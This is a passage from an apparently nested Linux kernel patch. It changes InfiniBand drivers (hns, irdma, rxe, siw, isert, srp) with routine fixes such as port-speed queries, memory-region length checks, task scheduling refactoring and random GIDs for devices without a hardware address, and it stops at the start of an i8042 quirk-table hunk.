+diff --git a/drivers/infiniband/hw/hns/hns_roce_main.c b/drivers/infiniband/hw/hns/hns_roce_main.c
+index 946ba1109e878..da1b33d818d82 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_main.c
++++ b/drivers/infiniband/hw/hns/hns_roce_main.c
+@@ -219,6 +219,7 @@ static int hns_roce_query_port(struct ib_device *ib_dev, u32 port_num,
+ 	unsigned long flags;
+ 	enum ib_mtu mtu;
+ 	u32 port;
++	int ret;
+ 
+ 	port = port_num - 1;
+ 
+@@ -231,8 +232,10 @@ static int hns_roce_query_port(struct ib_device *ib_dev, u32 port_num,
+ 				IB_PORT_BOOT_MGMT_SUP;
+ 	props->max_msg_sz = HNS_ROCE_MAX_MSG_LEN;
+ 	props->pkey_tbl_len = 1;
+-	props->active_width = IB_WIDTH_4X;
+-	props->active_speed = 1;
++	ret = ib_get_eth_speed(ib_dev, port_num, &props->active_speed,
++			       &props->active_width);
++	if (ret)
++		ibdev_warn(ib_dev, "failed to get speed, ret = %d.\n", ret);
+ 
+ 	spin_lock_irqsave(&hr_dev->iboe.lock, flags);
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_qp.c b/drivers/infiniband/hw/hns/hns_roce_qp.c
+index 0ae335fb205ca..7a95f8677a02c 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_qp.c
++++ b/drivers/infiniband/hw/hns/hns_roce_qp.c
+@@ -170,14 +170,29 @@ static void hns_roce_ib_qp_event(struct hns_roce_qp *hr_qp,
+ 	}
+ }
+ 
+-static u8 get_least_load_bankid_for_qp(struct hns_roce_bank *bank)
++static u8 get_affinity_cq_bank(u8 qp_bank)
+ {
+-	u32 least_load = bank[0].inuse;
++	return (qp_bank >> 1) & CQ_BANKID_MASK;
++}
++
++static u8 get_least_load_bankid_for_qp(struct ib_qp_init_attr *init_attr,
++					struct hns_roce_bank *bank)
++{
++#define INVALID_LOAD_QPNUM 0xFFFFFFFF
++	struct ib_cq *scq = init_attr->send_cq;
++	u32 least_load = INVALID_LOAD_QPNUM;
++	unsigned long cqn = 0;
+ 	u8 bankid = 0;
+ 	u32 bankcnt;
+ 	u8 i;
+ 
+-	for (i = 1; i < HNS_ROCE_QP_BANK_NUM; i++) {
++	if (scq)
++		cqn = to_hr_cq(scq)->cqn;
++
++	for (i = 0; i < HNS_ROCE_QP_BANK_NUM; i++) {
++		if (scq && (get_affinity_cq_bank(i) != (cqn & CQ_BANKID_MASK)))
++			continue;
++
+ 		bankcnt = bank[i].inuse;
+ 		if (bankcnt < least_load) {
+ 			least_load = bankcnt;
+@@ -209,7 +224,8 @@ static int alloc_qpn_with_bankid(struct hns_roce_bank *bank, u8 bankid,
+ 
+ 	return 0;
+ }
+-static int alloc_qpn(struct hns_roce_dev *hr_dev, struct hns_roce_qp *hr_qp)
++static int alloc_qpn(struct hns_roce_dev *hr_dev, struct hns_roce_qp *hr_qp,
++		     struct ib_qp_init_attr *init_attr)
+ {
+ 	struct hns_roce_qp_table *qp_table = &hr_dev->qp_table;
+ 	unsigned long num = 0;
+@@ -220,7 +236,7 @@ static int alloc_qpn(struct hns_roce_dev *hr_dev, struct hns_roce_qp *hr_qp)
+ 		num = 1;
+ 	} else {
+ 		mutex_lock(&qp_table->bank_mutex);
+-		bankid = get_least_load_bankid_for_qp(qp_table->bank);
++		bankid = get_least_load_bankid_for_qp(init_attr, qp_table->bank);
+ 
+ 		ret = alloc_qpn_with_bankid(&qp_table->bank[bankid], bankid,
+ 					    &num);
+@@ -1146,7 +1162,7 @@ static int hns_roce_create_qp_common(struct hns_roce_dev *hr_dev,
+ 		goto err_buf;
+ 	}
+ 
+-	ret = alloc_qpn(hr_dev, hr_qp);
++	ret = alloc_qpn(hr_dev, hr_qp, init_attr);
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to alloc QPN, ret = %d.\n", ret);
+ 		goto err_qpn;
+diff --git a/drivers/infiniband/hw/irdma/ctrl.c b/drivers/infiniband/hw/irdma/ctrl.c
+index 6544c9c60b7db..d98bfb83c3b4b 100644
+--- a/drivers/infiniband/hw/irdma/ctrl.c
++++ b/drivers/infiniband/hw/irdma/ctrl.c
+@@ -1061,6 +1061,9 @@ static int irdma_sc_alloc_stag(struct irdma_sc_dev *dev,
+ 	u64 hdr;
+ 	enum irdma_page_size page_size;
+ 
++	if (!info->total_len && !info->all_memory)
++		return -EINVAL;
++
+ 	if (info->page_size == 0x40000000)
+ 		page_size = IRDMA_PAGE_SIZE_1G;
+ 	else if (info->page_size == 0x200000)
+@@ -1126,6 +1129,9 @@ static int irdma_sc_mr_reg_non_shared(struct irdma_sc_dev *dev,
+ 	u8 addr_type;
+ 	enum irdma_page_size page_size;
+ 
++	if (!info->total_len && !info->all_memory)
++		return -EINVAL;
++
+ 	if (info->page_size == 0x40000000)
+ 		page_size = IRDMA_PAGE_SIZE_1G;
+ 	else if (info->page_size == 0x200000)
+diff --git a/drivers/infiniband/hw/irdma/main.h b/drivers/infiniband/hw/irdma/main.h
+index e64205839d039..9cbe64311f985 100644
+--- a/drivers/infiniband/hw/irdma/main.h
++++ b/drivers/infiniband/hw/irdma/main.h
+@@ -236,7 +236,7 @@ struct irdma_qv_info {
+ 
+ struct irdma_qvlist_info {
+ 	u32 num_vectors;
+-	struct irdma_qv_info qv_info[1];
++	struct irdma_qv_info qv_info[];
+ };
+ 
+ struct irdma_gen_ops {
+diff --git a/drivers/infiniband/hw/irdma/type.h b/drivers/infiniband/hw/irdma/type.h
+index d6cb94dc744c5..1c7cbf7c67bed 100644
+--- a/drivers/infiniband/hw/irdma/type.h
++++ b/drivers/infiniband/hw/irdma/type.h
+@@ -1015,6 +1015,7 @@ struct irdma_allocate_stag_info {
+ 	bool remote_access:1;
+ 	bool use_hmc_fcn_index:1;
+ 	bool use_pf_rid:1;
++	bool all_memory:1;
+ 	u8 hmc_fcn_index;
+ };
+ 
+@@ -1042,6 +1043,7 @@ struct irdma_reg_ns_stag_info {
+ 	bool use_hmc_fcn_index:1;
+ 	u8 hmc_fcn_index;
+ 	bool use_pf_rid:1;
++	bool all_memory:1;
+ };
+ 
+ struct irdma_fast_reg_stag_info {
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 6a8bb6ed4bf43..3b8b2341981ea 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -2557,7 +2557,8 @@ static int irdma_hw_alloc_stag(struct irdma_device *iwdev,
+ 			       struct irdma_mr *iwmr)
+ {
+ 	struct irdma_allocate_stag_info *info;
+-	struct irdma_pd *iwpd = to_iwpd(iwmr->ibmr.pd);
++	struct ib_pd *pd = iwmr->ibmr.pd;
++	struct irdma_pd *iwpd = to_iwpd(pd);
+ 	int status;
+ 	struct irdma_cqp_request *cqp_request;
+ 	struct cqp_cmds_info *cqp_info;
+@@ -2573,6 +2574,7 @@ static int irdma_hw_alloc_stag(struct irdma_device *iwdev,
+ 	info->stag_idx = iwmr->stag >> IRDMA_CQPSQ_STAG_IDX_S;
+ 	info->pd_id = iwpd->sc_pd.pd_id;
+ 	info->total_len = iwmr->len;
++	info->all_memory = pd->flags & IB_PD_UNSAFE_GLOBAL_RKEY;
+ 	info->remote_access = true;
+ 	cqp_info->cqp_cmd = IRDMA_OP_ALLOC_STAG;
+ 	cqp_info->post_sq = 1;
+@@ -2620,6 +2622,8 @@ static struct ib_mr *irdma_alloc_mr(struct ib_pd *pd, enum ib_mr_type mr_type,
+ 	iwmr->type = IRDMA_MEMREG_TYPE_MEM;
+ 	palloc = &iwpbl->pble_alloc;
+ 	iwmr->page_cnt = max_num_sg;
++	/* Use system PAGE_SIZE as the sg page sizes are unknown at this point */
++	iwmr->len = max_num_sg * PAGE_SIZE;
+ 	err_code = irdma_get_pble(iwdev->rf->pble_rsrc, palloc, iwmr->page_cnt,
+ 				  false);
+ 	if (err_code)
+@@ -2699,7 +2703,8 @@ static int irdma_hwreg_mr(struct irdma_device *iwdev, struct irdma_mr *iwmr,
+ {
+ 	struct irdma_pbl *iwpbl = &iwmr->iwpbl;
+ 	struct irdma_reg_ns_stag_info *stag_info;
+-	struct irdma_pd *iwpd = to_iwpd(iwmr->ibmr.pd);
++	struct ib_pd *pd = iwmr->ibmr.pd;
++	struct irdma_pd *iwpd = to_iwpd(pd);
+ 	struct irdma_pble_alloc *palloc = &iwpbl->pble_alloc;
+ 	struct irdma_cqp_request *cqp_request;
+ 	struct cqp_cmds_info *cqp_info;
+@@ -2718,6 +2723,7 @@ static int irdma_hwreg_mr(struct irdma_device *iwdev, struct irdma_mr *iwmr,
+ 	stag_info->total_len = iwmr->len;
+ 	stag_info->access_rights = irdma_get_mr_access(access);
+ 	stag_info->pd_id = iwpd->sc_pd.pd_id;
++	stag_info->all_memory = pd->flags & IB_PD_UNSAFE_GLOBAL_RKEY;
+ 	if (stag_info->access_rights & IRDMA_ACCESS_FLAGS_ZERO_BASED)
+ 		stag_info->addr_type = IRDMA_ADDR_TYPE_ZERO_BASED;
+ 	else
+@@ -4354,7 +4360,6 @@ static int irdma_query_ah(struct ib_ah *ibah, struct rdma_ah_attr *ah_attr)
+ 		ah_attr->grh.traffic_class = ah->sc_ah.ah_info.tc_tos;
+ 		ah_attr->grh.hop_limit = ah->sc_ah.ah_info.hop_ttl;
+ 		ah_attr->grh.sgid_index = ah->sgid_index;
+-		ah_attr->grh.sgid_index = ah->sgid_index;
+ 		memcpy(&ah_attr->grh.dgid, &ah->dgid,
+ 		       sizeof(ah_attr->grh.dgid));
+ 	}
+diff --git a/drivers/infiniband/sw/rxe/rxe_comp.c b/drivers/infiniband/sw/rxe/rxe_comp.c
+index fb0c008af78cc..d2a2501236174 100644
+--- a/drivers/infiniband/sw/rxe/rxe_comp.c
++++ b/drivers/infiniband/sw/rxe/rxe_comp.c
+@@ -118,7 +118,7 @@ void retransmit_timer(struct timer_list *t)
+ 
+ 	if (qp->valid) {
+ 		qp->comp.timeout = 1;
+-		rxe_run_task(&qp->comp.task, 1);
++		rxe_sched_task(&qp->comp.task);
+ 	}
+ }
+ 
+@@ -132,7 +132,10 @@ void rxe_comp_queue_pkt(struct rxe_qp *qp, struct sk_buff *skb)
+ 	if (must_sched != 0)
+ 		rxe_counter_inc(SKB_TO_PKT(skb)->rxe, RXE_CNT_COMPLETER_SCHED);
+ 
+-	rxe_run_task(&qp->comp.task, must_sched);
++	if (must_sched)
++		rxe_sched_task(&qp->comp.task);
++	else
++		rxe_run_task(&qp->comp.task);
+ }
+ 
+ static inline enum comp_state get_wqe(struct rxe_qp *qp,
+@@ -305,7 +308,7 @@ static inline enum comp_state check_ack(struct rxe_qp *qp,
+ 					qp->comp.psn = pkt->psn;
+ 					if (qp->req.wait_psn) {
+ 						qp->req.wait_psn = 0;
+-						rxe_run_task(&qp->req.task, 0);
++						rxe_run_task(&qp->req.task);
+ 					}
+ 				}
+ 				return COMPST_ERROR_RETRY;
+@@ -452,7 +455,7 @@ static void do_complete(struct rxe_qp *qp, struct rxe_send_wqe *wqe)
+ 	 */
+ 	if (qp->req.wait_fence) {
+ 		qp->req.wait_fence = 0;
+-		rxe_run_task(&qp->req.task, 0);
++		rxe_run_task(&qp->req.task);
+ 	}
+ }
+ 
+@@ -466,7 +469,7 @@ static inline enum comp_state complete_ack(struct rxe_qp *qp,
+ 		if (qp->req.need_rd_atomic) {
+ 			qp->comp.timeout_retry = 0;
+ 			qp->req.need_rd_atomic = 0;
+-			rxe_run_task(&qp->req.task, 0);
++			rxe_run_task(&qp->req.task);
+ 		}
+ 	}
+ 
+@@ -512,7 +515,7 @@ static inline enum comp_state complete_wqe(struct rxe_qp *qp,
+ 
+ 		if (qp->req.wait_psn) {
+ 			qp->req.wait_psn = 0;
+-			rxe_run_task(&qp->req.task, 1);
++			rxe_sched_task(&qp->req.task);
+ 		}
+ 	}
+ 
+@@ -646,7 +649,7 @@ int rxe_completer(void *arg)
+ 
+ 			if (qp->req.wait_psn) {
+ 				qp->req.wait_psn = 0;
+-				rxe_run_task(&qp->req.task, 1);
++				rxe_sched_task(&qp->req.task);
+ 			}
+ 
+ 			state = COMPST_DONE;
+@@ -714,7 +717,7 @@ int rxe_completer(void *arg)
+ 							RXE_CNT_COMP_RETRY);
+ 					qp->req.need_retry = 1;
+ 					qp->comp.started_retry = 1;
+-					rxe_run_task(&qp->req.task, 0);
++					rxe_run_task(&qp->req.task);
+ 				}
+ 				goto done;
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_net.c b/drivers/infiniband/sw/rxe/rxe_net.c
+index 65d16024b3bf6..719432808a063 100644
+--- a/drivers/infiniband/sw/rxe/rxe_net.c
++++ b/drivers/infiniband/sw/rxe/rxe_net.c
+@@ -348,7 +348,7 @@ static void rxe_skb_tx_dtor(struct sk_buff *skb)
+ 
+ 	if (unlikely(qp->need_req_skb &&
+ 		     skb_out < RXE_INFLIGHT_SKBS_PER_QP_LOW))
+-		rxe_run_task(&qp->req.task, 1);
++		rxe_sched_task(&qp->req.task);
+ 
+ 	rxe_put(qp);
+ }
+@@ -435,7 +435,7 @@ int rxe_xmit_packet(struct rxe_qp *qp, struct rxe_pkt_info *pkt,
+ 	if ((qp_type(qp) != IB_QPT_RC) &&
+ 	    (pkt->mask & RXE_END_MASK)) {
+ 		pkt->wqe->state = wqe_state_done;
+-		rxe_run_task(&qp->comp.task, 1);
++		rxe_sched_task(&qp->comp.task);
+ 	}
+ 
+ 	rxe_counter_inc(rxe, RXE_CNT_SENT_PKTS);
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index 59b2024b34ef4..709c63e9773c5 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -539,10 +539,10 @@ static void rxe_qp_drain(struct rxe_qp *qp)
+ 		if (qp->req.state != QP_STATE_DRAINED) {
+ 			qp->req.state = QP_STATE_DRAIN;
+ 			if (qp_type(qp) == IB_QPT_RC)
+-				rxe_run_task(&qp->comp.task, 1);
++				rxe_sched_task(&qp->comp.task);
+ 			else
+ 				__rxe_do_task(&qp->comp.task);
+-			rxe_run_task(&qp->req.task, 1);
++			rxe_sched_task(&qp->req.task);
+ 		}
+ 	}
+ }
+@@ -556,13 +556,13 @@ void rxe_qp_error(struct rxe_qp *qp)
+ 	qp->attr.qp_state = IB_QPS_ERR;
+ 
+ 	/* drain work and packet queues */
+-	rxe_run_task(&qp->resp.task, 1);
++	rxe_sched_task(&qp->resp.task);
+ 
+ 	if (qp_type(qp) == IB_QPT_RC)
+-		rxe_run_task(&qp->comp.task, 1);
++		rxe_sched_task(&qp->comp.task);
+ 	else
+ 		__rxe_do_task(&qp->comp.task);
+-	rxe_run_task(&qp->req.task, 1);
++	rxe_sched_task(&qp->req.task);
+ }
+ 
+ /* called by the modify qp verb */
+diff --git a/drivers/infiniband/sw/rxe/rxe_req.c b/drivers/infiniband/sw/rxe/rxe_req.c
+index f637712079705..2ace1007a4195 100644
+--- a/drivers/infiniband/sw/rxe/rxe_req.c
++++ b/drivers/infiniband/sw/rxe/rxe_req.c
+@@ -105,7 +105,7 @@ void rnr_nak_timer(struct timer_list *t)
+ 	/* request a send queue retry */
+ 	qp->req.need_retry = 1;
+ 	qp->req.wait_for_rnr_timer = 0;
+-	rxe_run_task(&qp->req.task, 1);
++	rxe_sched_task(&qp->req.task);
+ }
+ 
+ static struct rxe_send_wqe *req_next_wqe(struct rxe_qp *qp)
+@@ -529,10 +529,11 @@ static void save_state(struct rxe_send_wqe *wqe,
+ 		       struct rxe_send_wqe *rollback_wqe,
+ 		       u32 *rollback_psn)
+ {
+-	rollback_wqe->state     = wqe->state;
++	rollback_wqe->state = wqe->state;
+ 	rollback_wqe->first_psn = wqe->first_psn;
+-	rollback_wqe->last_psn  = wqe->last_psn;
+-	*rollback_psn		= qp->req.psn;
++	rollback_wqe->last_psn = wqe->last_psn;
++	rollback_wqe->dma = wqe->dma;
++	*rollback_psn = qp->req.psn;
+ }
+ 
+ static void rollback_state(struct rxe_send_wqe *wqe,
+@@ -540,10 +541,11 @@ static void rollback_state(struct rxe_send_wqe *wqe,
+ 			   struct rxe_send_wqe *rollback_wqe,
+ 			   u32 rollback_psn)
+ {
+-	wqe->state     = rollback_wqe->state;
++	wqe->state = rollback_wqe->state;
+ 	wqe->first_psn = rollback_wqe->first_psn;
+-	wqe->last_psn  = rollback_wqe->last_psn;
+-	qp->req.psn    = rollback_psn;
++	wqe->last_psn = rollback_wqe->last_psn;
++	wqe->dma = rollback_wqe->dma;
++	qp->req.psn = rollback_psn;
+ }
+ 
+ static void update_state(struct rxe_qp *qp, struct rxe_pkt_info *pkt)
+@@ -608,7 +610,7 @@ static int rxe_do_local_ops(struct rxe_qp *qp, struct rxe_send_wqe *wqe)
+ 	 * which can lead to a deadlock. So go ahead and complete
+ 	 * it now.
+ 	 */
+-	rxe_run_task(&qp->comp.task, 1);
++	rxe_sched_task(&qp->comp.task);
+ 
+ 	return 0;
+ }
+@@ -733,7 +735,7 @@ int rxe_requester(void *arg)
+ 						       qp->req.wqe_index);
+ 			wqe->state = wqe_state_done;
+ 			wqe->status = IB_WC_SUCCESS;
+-			rxe_run_task(&qp->comp.task, 0);
++			rxe_run_task(&qp->comp.task);
+ 			goto done;
+ 		}
+ 		payload = mtu;
+@@ -746,6 +748,9 @@ int rxe_requester(void *arg)
+ 	pkt.mask = rxe_opcode[opcode].mask;
+ 	pkt.wqe = wqe;
+ 
++	/* save wqe state before we build and send packet */
++	save_state(wqe, qp, &rollback_wqe, &rollback_psn);
++
+ 	av = rxe_get_av(&pkt, &ah);
+ 	if (unlikely(!av)) {
+ 		pr_err("qp#%d Failed no address vector\n", qp_num(qp));
+@@ -778,29 +783,29 @@ int rxe_requester(void *arg)
+ 	if (ah)
+ 		rxe_put(ah);
+ 
+-	/*
+-	 * To prevent a race on wqe access between requester and completer,
+-	 * wqe members state and psn need to be set before calling
+-	 * rxe_xmit_packet().
+-	 * Otherwise, completer might initiate an unjustified retry flow.
+-	 */
+-	save_state(wqe, qp, &rollback_wqe, &rollback_psn);
++	/* update wqe state as though we had sent it */
+ 	update_wqe_state(qp, wqe, &pkt);
+ 	update_wqe_psn(qp, wqe, &pkt, payload);
+ 
+ 	err = rxe_xmit_packet(qp, &pkt, skb);
+ 	if (err) {
+-		qp->need_req_skb = 1;
++		if (err != -EAGAIN) {
++			wqe->status = IB_WC_LOC_QP_OP_ERR;
++			goto err;
++		}
+ 
++		/* the packet was dropped so reset wqe to the state
++		 * before we sent it so we can try to resend
++		 */
+ 		rollback_state(wqe, qp, &rollback_wqe, rollback_psn);
+ 
+-		if (err == -EAGAIN) {
+-			rxe_run_task(&qp->req.task, 1);
+-			goto exit;
+-		}
++		/* force a delay until the dropped packet is freed and
++		 * the send queue is drained below the low water mark
++		 */
++		qp->need_req_skb = 1;
+ 
+-		wqe->status = IB_WC_LOC_QP_OP_ERR;
+-		goto err;
++		rxe_sched_task(&qp->req.task);
++		goto exit;
+ 	}
+ 
+ 	update_state(qp, &pkt);
+@@ -817,7 +822,7 @@ err:
+ 	qp->req.wqe_index = queue_next_index(qp->sq.queue, qp->req.wqe_index);
+ 	wqe->state = wqe_state_error;
+ 	qp->req.state = QP_STATE_ERROR;
+-	rxe_run_task(&qp->comp.task, 0);
++	rxe_run_task(&qp->comp.task);
+ exit:
+ 	ret = -EAGAIN;
+ out:
+diff --git a/drivers/infiniband/sw/rxe/rxe_resp.c b/drivers/infiniband/sw/rxe/rxe_resp.c
+index 9f65c346d8432..a45202cecf2d7 100644
+--- a/drivers/infiniband/sw/rxe/rxe_resp.c
++++ b/drivers/infiniband/sw/rxe/rxe_resp.c
+@@ -91,7 +91,10 @@ void rxe_resp_queue_pkt(struct rxe_qp *qp, struct sk_buff *skb)
+ 	must_sched = (pkt->opcode == IB_OPCODE_RC_RDMA_READ_REQUEST) ||
+ 			(skb_queue_len(&qp->req_pkts) > 1);
+ 
+-	rxe_run_task(&qp->resp.task, must_sched);
++	if (must_sched)
++		rxe_sched_task(&qp->resp.task);
++	else
++		rxe_run_task(&qp->resp.task);
+ }
+ 
+ static inline enum resp_states get_req(struct rxe_qp *qp,
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.c b/drivers/infiniband/sw/rxe/rxe_task.c
+index 182d0532a8ab9..446ee2c3d3813 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.c
++++ b/drivers/infiniband/sw/rxe/rxe_task.c
+@@ -127,15 +127,20 @@ void rxe_cleanup_task(struct rxe_task *task)
+ 	tasklet_kill(&task->tasklet);
+ }
+ 
+-void rxe_run_task(struct rxe_task *task, int sched)
++void rxe_run_task(struct rxe_task *task)
+ {
+ 	if (task->destroyed)
+ 		return;
+ 
+-	if (sched)
+-		tasklet_schedule(&task->tasklet);
+-	else
+-		rxe_do_task(&task->tasklet);
++	rxe_do_task(&task->tasklet);
++}
++
++void rxe_sched_task(struct rxe_task *task)
++{
++	if (task->destroyed)
++		return;
++
++	tasklet_schedule(&task->tasklet);
+ }
+ 
+ void rxe_disable_task(struct rxe_task *task)
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.h b/drivers/infiniband/sw/rxe/rxe_task.h
+index b3dfd970d1dc6..590b1c1d7e7ca 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.h
++++ b/drivers/infiniband/sw/rxe/rxe_task.h
+@@ -52,10 +52,9 @@ int __rxe_do_task(struct rxe_task *task);
+  */
+ void rxe_do_task(struct tasklet_struct *t);
+ 
+-/* run a task, else schedule it to run as a tasklet, The decision
+- * to run or schedule tasklet is based on the parameter sched.
+- */
+-void rxe_run_task(struct rxe_task *task, int sched);
++void rxe_run_task(struct rxe_task *task);
++
++void rxe_sched_task(struct rxe_task *task);
+ 
+ /* keep a task from scheduling */
+ void rxe_disable_task(struct rxe_task *task);
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.c b/drivers/infiniband/sw/rxe/rxe_verbs.c
+index be13bcb4cc406..065717c11cba5 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.c
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.c
+@@ -678,9 +678,9 @@ static int rxe_post_send_kernel(struct rxe_qp *qp, const struct ib_send_wr *wr,
+ 		wr = next;
+ 	}
+ 
+-	rxe_run_task(&qp->req.task, 1);
++	rxe_sched_task(&qp->req.task);
+ 	if (unlikely(qp->req.state == QP_STATE_ERROR))
+-		rxe_run_task(&qp->comp.task, 1);
++		rxe_sched_task(&qp->comp.task);
+ 
+ 	return err;
+ }
+@@ -702,7 +702,7 @@ static int rxe_post_send(struct ib_qp *ibqp, const struct ib_send_wr *wr,
+ 
+ 	if (qp->is_user) {
+ 		/* Utilize process context to do protocol processing */
+-		rxe_run_task(&qp->req.task, 0);
++		rxe_run_task(&qp->req.task);
+ 		return 0;
+ 	} else
+ 		return rxe_post_send_kernel(qp, wr, bad_wr);
+@@ -740,7 +740,7 @@ static int rxe_post_recv(struct ib_qp *ibqp, const struct ib_recv_wr *wr,
+ 	spin_unlock_irqrestore(&rq->producer_lock, flags);
+ 
+ 	if (qp->resp.state == QP_STATE_ERROR)
+-		rxe_run_task(&qp->resp.task, 1);
++		rxe_sched_task(&qp->resp.task);
+ 
+ 	return err;
+ }
+diff --git a/drivers/infiniband/sw/siw/siw.h b/drivers/infiniband/sw/siw/siw.h
+index 2f3a9cda3850f..8b4a710b82bc1 100644
+--- a/drivers/infiniband/sw/siw/siw.h
++++ b/drivers/infiniband/sw/siw/siw.h
+@@ -74,6 +74,7 @@ struct siw_device {
+ 
+ 	u32 vendor_part_id;
+ 	int numa_node;
++	char raw_gid[ETH_ALEN];
+ 
+ 	/* physical port state (only one port per device) */
+ 	enum ib_port_state state;
+diff --git a/drivers/infiniband/sw/siw/siw_cm.c b/drivers/infiniband/sw/siw/siw_cm.c
+index f88d2971c2c63..552d8271e423b 100644
+--- a/drivers/infiniband/sw/siw/siw_cm.c
++++ b/drivers/infiniband/sw/siw/siw_cm.c
+@@ -1496,7 +1496,6 @@ error:
+ 
+ 		cep->cm_id = NULL;
+ 		id->rem_ref(id);
+-		siw_cep_put(cep);
+ 
+ 		qp->cep = NULL;
+ 		siw_cep_put(cep);
+diff --git a/drivers/infiniband/sw/siw/siw_main.c b/drivers/infiniband/sw/siw/siw_main.c
+index 65b5cda5457ba..f45600d169ae7 100644
+--- a/drivers/infiniband/sw/siw/siw_main.c
++++ b/drivers/infiniband/sw/siw/siw_main.c
+@@ -75,8 +75,7 @@ static int siw_device_register(struct siw_device *sdev, const char *name)
+ 		return rv;
+ 	}
+ 
+-	siw_dbg(base_dev, "HWaddr=%pM\n", sdev->netdev->dev_addr);
+-
++	siw_dbg(base_dev, "HWaddr=%pM\n", sdev->raw_gid);
+ 	return 0;
+ }
+ 
+@@ -313,24 +312,19 @@ static struct siw_device *siw_device_create(struct net_device *netdev)
+ 		return NULL;
+ 
+ 	base_dev = &sdev->base_dev;
+-
+ 	sdev->netdev = netdev;
+ 
+-	if (netdev->type != ARPHRD_LOOPBACK && netdev->type != ARPHRD_NONE) {
+-		addrconf_addr_eui48((unsigned char *)&base_dev->node_guid,
+-				    netdev->dev_addr);
++	if (netdev->addr_len) {
++		memcpy(sdev->raw_gid, netdev->dev_addr,
++		       min_t(unsigned int, netdev->addr_len, ETH_ALEN));
+ 	} else {
+ 		/*
+-		 * This device does not have a HW address,
+-		 * but connection mangagement lib expects gid != 0
++		 * This device does not have a HW address, but
++		 * connection mangagement requires a unique gid.
+ 		 */
+-		size_t len = min_t(size_t, strlen(base_dev->name), 6);
+-		char addr[6] = { };
+-
+-		memcpy(addr, base_dev->name, len);
+-		addrconf_addr_eui48((unsigned char *)&base_dev->node_guid,
+-				    addr);
++		eth_random_addr(sdev->raw_gid);
+ 	}
++	addrconf_addr_eui48((u8 *)&base_dev->node_guid, sdev->raw_gid);
+ 
+ 	base_dev->uverbs_cmd_mask |= BIT_ULL(IB_USER_VERBS_CMD_POST_SEND);
+ 
+diff --git a/drivers/infiniband/sw/siw/siw_verbs.c b/drivers/infiniband/sw/siw/siw_verbs.c
+index 906fde1a2a0de..193f7d58d3845 100644
+--- a/drivers/infiniband/sw/siw/siw_verbs.c
++++ b/drivers/infiniband/sw/siw/siw_verbs.c
+@@ -157,7 +157,7 @@ int siw_query_device(struct ib_device *base_dev, struct ib_device_attr *attr,
+ 	attr->vendor_part_id = sdev->vendor_part_id;
+ 
+ 	addrconf_addr_eui48((u8 *)&attr->sys_image_guid,
+-			    sdev->netdev->dev_addr);
++			    sdev->raw_gid);
+ 
+ 	return 0;
+ }
+@@ -218,7 +218,7 @@ int siw_query_gid(struct ib_device *base_dev, u32 port, int idx,
+ 
+ 	/* subnet_prefix == interface_id == 0; */
+ 	memset(gid, 0, sizeof(*gid));
+-	memcpy(&gid->raw[0], sdev->netdev->dev_addr, 6);
++	memcpy(gid->raw, sdev->raw_gid, ETH_ALEN);
+ 
+ 	return 0;
+ }
+@@ -1494,7 +1494,7 @@ int siw_map_mr_sg(struct ib_mr *base_mr, struct scatterlist *sl, int num_sle,
+ 
+ 	if (pbl->max_buf < num_sle) {
+ 		siw_dbg_mem(mem, "too many SGE's: %d > %d\n",
+-			    mem->pbl->max_buf, num_sle);
++			    num_sle, pbl->max_buf);
+ 		return -ENOMEM;
+ 	}
+ 	for_each_sg(sl, slp, num_sle, i) {
+diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c
+index a7fef3ea77fe3..a02a3caeaa4e7 100644
+--- a/drivers/infiniband/ulp/isert/ib_isert.c
++++ b/drivers/infiniband/ulp/isert/ib_isert.c
+@@ -2571,6 +2571,8 @@ static void isert_wait_conn(struct iscsit_conn *conn)
+ 	isert_put_unsol_pending_cmds(conn);
+ 	isert_wait4cmds(conn);
+ 	isert_wait4logout(isert_conn);
++
++	queue_work(isert_release_wq, &isert_conn->release_work);
+ }
+ 
+ static void isert_free_conn(struct iscsit_conn *conn)
+diff --git a/drivers/infiniband/ulp/srp/ib_srp.c b/drivers/infiniband/ulp/srp/ib_srp.c
+index b4d6a4a5ae81e..a7580c4855fec 100644
+--- a/drivers/infiniband/ulp/srp/ib_srp.c
++++ b/drivers/infiniband/ulp/srp/ib_srp.c
+@@ -1984,12 +1984,8 @@ static void srp_process_rsp(struct srp_rdma_ch *ch, struct srp_rsp *rsp)
+ 
+ 		if (unlikely(rsp->flags & SRP_RSP_FLAG_DIUNDER))
+ 			scsi_set_resid(scmnd, be32_to_cpu(rsp->data_in_res_cnt));
+-		else if (unlikely(rsp->flags & SRP_RSP_FLAG_DIOVER))
+-			scsi_set_resid(scmnd, -be32_to_cpu(rsp->data_in_res_cnt));
+ 		else if (unlikely(rsp->flags & SRP_RSP_FLAG_DOUNDER))
+ 			scsi_set_resid(scmnd, be32_to_cpu(rsp->data_out_res_cnt));
+-		else if (unlikely(rsp->flags & SRP_RSP_FLAG_DOOVER))
+-			scsi_set_resid(scmnd, -be32_to_cpu(rsp->data_out_res_cnt));
+ 
+ 		srp_free_req(ch, req, scmnd,
+ 			     be32_to_cpu(rsp->req_lim_delta));
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index 028e45bd050bf..1724d6cb8649d 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -1281,6 +1281,13 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
